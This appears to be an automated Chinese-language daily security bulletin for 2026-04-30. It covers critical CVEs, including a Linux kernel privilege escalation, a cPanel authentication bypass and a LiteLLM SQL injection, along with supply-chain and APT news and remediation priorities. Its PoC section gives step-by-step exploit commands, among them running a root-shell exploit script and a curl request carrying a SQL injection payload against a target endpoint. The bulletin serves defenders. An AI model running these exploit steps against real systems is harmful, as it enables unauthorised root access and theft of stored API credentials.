
每日安全情报报告 · 2026-04-30报告日期2026年04月30日 |风险等级汇总 严重×4 高危×2本期焦点Linux 内核 Copy Fail 零日全版本通杀 / cPanel 认证绕过在野利用 / Windows Shell 零点击哈希窃取 CISA 预警 / AI 网关 LiteLLM SQL 注入 36 小时内遭实战利用一、高危漏洞速报 CVE-2026-31431 — Linux 内核 Copy Fail 本地提权LPE属性详情漏洞类型内核逻辑缺陷 / 本地权限提升 (LPE) / 容器逃逸受影响组件Linux Kernelauthencesn 模块AF_ALG splice() 链式调用CVSS 评分9.8严重披露日期2026-04-29发现者Xint CodeTheori 公司在野利用⚠️POC 已公开漏洞静默存在近 10 年漏洞描述authencesn加密模块中存在直线型逻辑缺陷攻击者通过组合AF_ALG套接字与splice()系统调用可实现 4 字节页缓存page-cache任意写入进而篡改 setuid 二进制文件最终获取 root shell。无需竞态条件732 字节 Python 脚本即可通杀 2017 年以来所有主流 Linux 发行版Ubuntu、Amazon Linux、RHEL、SUSE、Debian、Arch 等。影响范围- Ubuntu 24.04 LTS / Amazon Linux 2023 / RHEL 10.1 / SUSE 16 及以上发行版- 所有使用默认内核配置AF_ALG 默认启用的 Linux 系统- 可用于容器逃逸威胁多租户云环境修复建议1. 升级内核至包含主线提交a664bf3d603d的版本2. 临时缓解禁用algif_aead模块bash echo install algif_aead /bin/false /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2/dev/null || true3. 容器/沙箱环境通过seccomp限制 AF_ALG 套接字创建 NVD 漏洞详情 | 官方披露页面 | 腾讯云安全通告 CVE-2026-41940 — cPanel WHM 认证绕过已在野利用属性详情漏洞类型CRLF 注入 / 认证绕过受影响组件cPanel WHMv11.110.x ~ v11.136.x/ WP SquaredCVSS 评分9.8严重披露日期2026-04-28在野利用⚠️已确认在野利用疑似零日活动始于 2026-02-23漏洞描述cPanel 守护进程cpsrvd在认证发生之前将新会话写入磁盘且未对用户输入进行消毒处理。攻击者可通过恶意构造的 Basic Authorization 头注入原始\r\n字符在会话文件中插入任意属性如userroot触发会话重新加载后获得管理员级访问权限全程无需有效凭证。Shodan 显示约 150 万个 cPanel 实例暴露于互联网。受影响版本与修复版本受影响版本修复版本cPanel WHM 11.110.0 11.110.0.9711.110.0.97cPanel WHM 11.126.0 11.126.0.5411.126.0.54cPanel WHM 11.134.0 11.134.0.2011.134.0.20cPanel WHM 11.136.0 11.136.0.511.136.0.5WP Squared 11.136.1 11.136.1.711.136.1.7修复建议立即升级至官方修复版本临时措施可封堵 TCP 2083cPanel和 2087WHM端口。 Rapid7 分析报告 | watchTowr 技术分析 | cPanel 官方安全公告 CVE-2026-42208 — LiteLLM AI 网关预认证 SQL 注入36 小时内在野利用属性详情漏洞类型SQL 注入 / 预认证受影响组件BerriAI LiteLLMv1.81.16 ~ v1.83.6CVSS 评分9.3严重披露日期2026-04-29在野利用⚠️CVE 公开后 36 小时内发现在野利用漏洞描述LiteLLM 代理在 API 密钥验证流程中将调用者提供的密值直接混入 SQL 查询文本而非参数化处理。攻击者无需任何认证仅需在请求头注入 SQL 语法即可操纵数据库查询Authorization: Bearer OR 11 --由于 LiteLLM 通常作为 AI 网关集中管理 OpenAI、Anthropic、AWS Bedrock 等多家服务商凭证成功利用可导致云端 AI API 密钥批量窃取、财务损失攻击者滥用高价值 API及云基础设施横向移动。修复建议pip install --upgrade litellm1.83.7无法立即升级时临时设置disable_error_logs: true。 Vulert 详细分析 | Sysdig 威胁研究 | FreeBuf 报道 CVE-2026-32202 — Windows Shell 欺骗漏洞CISA 紧急预警零点击属性详情漏洞类型NTLM 强制认证 / 欺骗漏洞零点击受影响组件Windows ShellWindows 10/11 全系列 Windows ServerCVSS 评分待 NVD 更新高危披露日期2026-04-14补丁发布 / 2026-04-29CISA 确认在野利用在野利用⚠️CISA 确认在野利用已加入 KEV 目录漏洞描述本漏洞为 CVE-2026-21510 的不完整补丁绕过。受害者仅需在 Windows 资源管理器中打开包含恶意 LNK 文件的文件夹无需点击Explorer 在渲染图标时自动发起 SMB 连接至攻击者服务器触发 NTLM 认证握手泄露 Net-NTLMv2 哈希。攻击者可利用哈希进行 NTLM 中继攻击或离线破解实现横向移动。关键时间线4月14日微软发布补丁时未标记已被利用导致大量组织未优先修复两周后 CISA 确认漏洞被活跃利用。修复建议立即安装 2026-04-14 微软补丁网络层封堵出站 SMB445/TCP流量限制 NTLM 在内网的使用范围。 CISA KEV 目录 | Help Net Security 分析 | The Hacker News 报道 CVE-2026-25874 — Hugging Face LeRobot 未修复 RCE无需认证属性详情漏洞类型Pickle 反序列化 / 远程代码执行受影响组件Hugging Face LeRobot近 24,000 GitHub Stars暂无修复版本CVSS 评分9.8严重披露日期2026-04-28补丁状态❌尚未修复官方正在评估漏洞描述LeRobot 异步推理架构中存在无认证 gRPC 不安全 Pickle 反序列化危险组合CVE-2026-25874。攻击者可通过发送特制的 gRPC 请求触发 Pickle 反序列化链在目标机器上执行任意代码无需任何凭证。广泛用于 AI 驱动的机器人研究场景一旦被利用可导致实验室/生产机器人系统被完全接管。 The Hacker News 报道 | CSDN 分析 | NVD 详情 CVE-2026-1868 — GitLab AI Gateway 模板注入 RCE属性详情漏洞类型模板注入 / 拒绝服务 / 远程代码执行受影响组件GitLab Duo Self-Hosted AI Gatewayv18.1.6 ~ v18.8.0CVSS 评分9.9严重披露日期2026-02-08持续关注中漏洞描述GitLab Duo Workflow Service 在处理用户提供的 Agent Platform Flow 定义时未对模板内容进行充分过滤导致模板注入漏洞。在最坏情况下可实现网关层面的远程代码执行RCE亦可触发拒绝服务影响所有部署自托管 AI Gateway 的 GitLab 企业用户。 FreeBuf 分析 | 阿里云 AVD 详情 | GitLab 安全公告二、漏洞 PoC 速递PoC 1CVE-2026-31431 Copy Fail — 732 字节 Python 脚本通杀所有 Linux来源TheoriXint Code 团队GitHub 仓库theori-io/copy-fail-CVE-2026-31431风险等级 严重直接获取 root shell无需竞态条件利用原理通过AF_ALG套接字与splice()系统调用的组合实现对/usr/bin/su等 setuid 二进制文件的页缓存page-cache任意写入篡改后直接执行获取 root 权限。使用步骤⚠️ 仅限授权渗透测试环境# Step 1: 克隆 PoC 仓库 git clone https://github.com/theori-io/copy-fail-CVE-2026-31431.git cd copy-fail-CVE-2026-31431 # Step 2: 确认 Python 版本需 Python 3.10仅需标准库 python3 --version # Step 3: 执行漏洞利用默认目标/usr/bin/su python3 copy_fail_exp.py # 可选指定其他 setuid 二进制作为目标 # python3 copy_fail_exp.py /usr/bin/passwd # Step 4: 脚本执行完毕后运行 su 获取 root shell su - # id → uid0(root)技术细节- 脚本仅 732 字节依赖标准库os,socket,zlib- 利用algif_aead内核模块的逻辑缺陷- 写入不持久重启后恢复但 root shell 真实有效- 可作为容器逃逸原语container escape primitive PoC 仓库 | Bugcrowd 技术分析 | ByteIota 详细解析PoC 2CVE-2026-42208 LiteLLM — 预认证 SQL 注入复现环境来源imjdlGitHub 仓库imjdl/CVE-2026-42208_lab风险等级 严重无需认证可窃取 AI 平台凭证利用原理LiteLLM 代理在处理 API 密钥验证时未使用参数化查询攻击者可通过构造恶意 Authorization 头实施 SQL 注入读取数据库中存储的所有 AI 服务商 API 密钥。使用步骤⚠️ 仅限授权渗透测试环境# Step 1: 克隆 PoC 复现实验室 git clone https://github.com/imjdl/CVE-2026-42208_lab.git cd CVE-2026-42208_lab # Step 2: 安装依赖并启动靶机环境 pip install -r requirements.txt docker-compose up -d # 或按 README 说明部署 # Step 3: 执行注入测试向 /chat/completions 端点发送 curl -X POST http://TARGET:4000/chat/completions \ -H Authorization: Bearer OR 11 -- \ -H Content-Type: application/json \ -d {model: gpt-4, messages: [{role: user, content: test}]} # Step 4: 利用 SQL 注入提取凭证表数据 # 目标表litellm_credentials.credential_values / litellm_config实战特征攻击者已表现出对 LiteLLM 数据库结构的了解初步探测后定向访问/key/generate、/key/info等密钥管理端点尝试将数据库读权限转化为代理控制权。 PoC 仓库 | Sysdig 威胁分析 | Vulert 详细报告PoC 3CVE-2026-41940 cPanel — 认证绕过 Session 检测工具来源debugactiveprocess基于 watchTowr 分析GitHub 仓库debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker风险等级 严重可获取任意 cPanel 账户管理员权限使用步骤⚠️ 仅限授权资产检测# Step 1: 克隆 Session 检测工具 git clone https://github.com/debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker.git cd cPanel-WHM-AuthBypass-Session-Checker # Step 2: 安装 Python 依赖 pip install -r requirements.txt # Step 3: 对目标 cPanel 实例进行会话绕过检测 python3 session_checker.py --target https://TARGET:2087 --check # Step 4: 输出结果会显示目标是否存在会话验证缺陷 # 若确认漏洞立即应用官方补丁升级至修复版本技术要点通过省略whostmgrsessionCookie 的预期字段并注入 CRLF 序列在服务器端会话文件中写入userroot等任意属性触发 cpsrvd 重新加载会话时获得管理员权限。 Session 检测工具 | watchTowr 分析 | Rapid7 ETR三、安全圈动态 文章一朝鲜 Lazarus APT 推出 Mach-O Man macOS 四阶段恶意软件套件来源GBHackers On SecurityMayura Kathir2026-04-29标签APT / 供应链攻击 / macOS / 加密货币朝鲜国家级 APT 组织 Lazarus Group 推出新型 macOS 恶意软件套件Mach-O Man采用 ClickFix 社会工程手法通过 Telegram 冒充同事发送虚假 Zoom/Teams 会议邀请诱导金融科技和加密货币企业高管手动复制执行终端命令。攻击链共分四阶段初始 stagerteamsSDK.bin→ 系统信息收集D1YrHRTg.bin→ macOS Keychain 及浏览器凭证窃取macrasv2→ 持久化minst2.bin伪装 OneDrive 注册 LaunchAgent。本次活动已导致多家金融科技公司的 Keychain 密钥和加密货币钱包凭证泄露。 阅读原文 文章二Mini Shai-Hulud SAP npm 供应链攻击220 万月下载包遭投毒来源The Hacker News2026-04-30/ Snyk 安全团队标签供应链攻击 / npm / SAP / CI/CD 凭证窃取安全研究人员披露一起自我命名为Mini Shai-Hulud的 npm 供应链攻击活动。攻击者篡改了 4 个 SAP CAP 生态系统相关 npm 包月下载量超 220 万注入混淆的预安装脚本基于 Bun 运行时在包安装时静默执行并窃取开发者环境变量、CI/CD secrets 及 API 密钥。OX Security 研究显示相关凭证已泄露至超过 1,200 个代码仓库。建议立即审查项目依赖、轮换暴露凭证并启用 npm audit 和依赖完整性校验。 The Hacker News 报道 | Snyk 技术分析 | OX Security 详情 文章三深度分析 Sorry 勒索软件的加密实现与行为特征来源安全客 / 3602026-04-29标签勒索软件 / 加密分析 / 恶意软件逆向安全研究人员对新型勒索软件Sorry进行深度剖析重点揭示其底层加密实现机制和网络行为特征。该勒索软件采用混合加密策略结合 AES-256 对称加密和 RSA 非对称密钥保护方案具备快速文件遍历能力和网络传播组件。文章包含对其 C2 通信模式、文件加密范围选择逻辑及持久化机制的详细技术分析为企业建立针对性检测规则提供参考。 安全客原文 文章四CISA 发出紧急预警 — Windows Shell 零点击漏洞 CVE-2026-32202 正被活跃利用来源Help Net SecurityZeljka Zorz2026-04-29标签CISA / Windows / NTLM / 零日CISA 将 CVE-2026-32202 加入已知利用漏洞KEV目录并要求联邦机构限期修复。该漏洞为 CVE-2026-21510 不完整补丁绕过受害者仅需打开含恶意 LNK 的文件夹Windows Explorer 即自动建立 SMB 连接泄露 NTLMv2 哈希APT28 等高级威胁行为者已将该技术纳入武器库。此案例再次警示补丁管理中已利用标记的滞后可导致大量组织未优先响应。 阅读原文 | The Register 分析 | CISA KEV 目录 文章五AI 时代的安全新风险 — Cursor AI 扩展权限漏洞与 LeRobot RCE 双重曝光来源Cyber Security News / The Hacker News2026-04-30标签AI 安全 / 开发者工具 / RCE / 访问控制2026年4月30日两项 AI 工具高危漏洞同日曝光其一广泛使用的 AI 编程环境Cursor被发现访问控制漏洞CVSS 8.2任何已安装的扩展均可获取开发者令牌导致完整凭证被窃其二Hugging Face 开源机器人学习框架LeRobotCVE-2026-25874CVSS 9.8存在尚未修复的 gRPC Pickle 反序列化组合 RCE 漏洞无需认证即可在目标机上执行任意代码。两起事件共同揭示 AI 工具生态链安全审查不足的系统性风险。 The Hacker News LeRobot 报道 | Cursor 漏洞分析 | CVE-2026-25874 详情四、风险处置优先级建议优先级CVE / 事件建议行动截止时间 P0CVE-2026-31431 Linux 内核 Copy Fail升级内核 / 临时禁用 algif_aead立即 P0CVE-2026-41940 cPanel 认证绕过升级至修复版本 / 封堵 2083/2087 端口立即 P0CVE-2026-32202 Windows Shell 零点击安装 4月14日补丁 / 封堵出站 SMB24h 内 P0CVE-2026-42208 LiteLLM SQL 注入升级 litellm1.83.7立即 P1CVE-2026-25874 LeRobot RCE未修复隔离 gRPC 端口 / 关注官方补丁48h 内 P1SAP npm 供应链投毒审查依赖 / 轮换 CI/CD 凭证24h 内 P2Lazarus Mach-O ManmacOS排查 LaunchAgent / 审计 Terminal 使用本周本报告由自动化安全情报系统生成信息来源NVD / CISA KEV / The Hacker News / FreeBuf / 安全客 / GBHackers / Rapid7 / Snyk / GitHub。所有 PoC 信息仅供授权安全研究使用请遵守相关法律法规。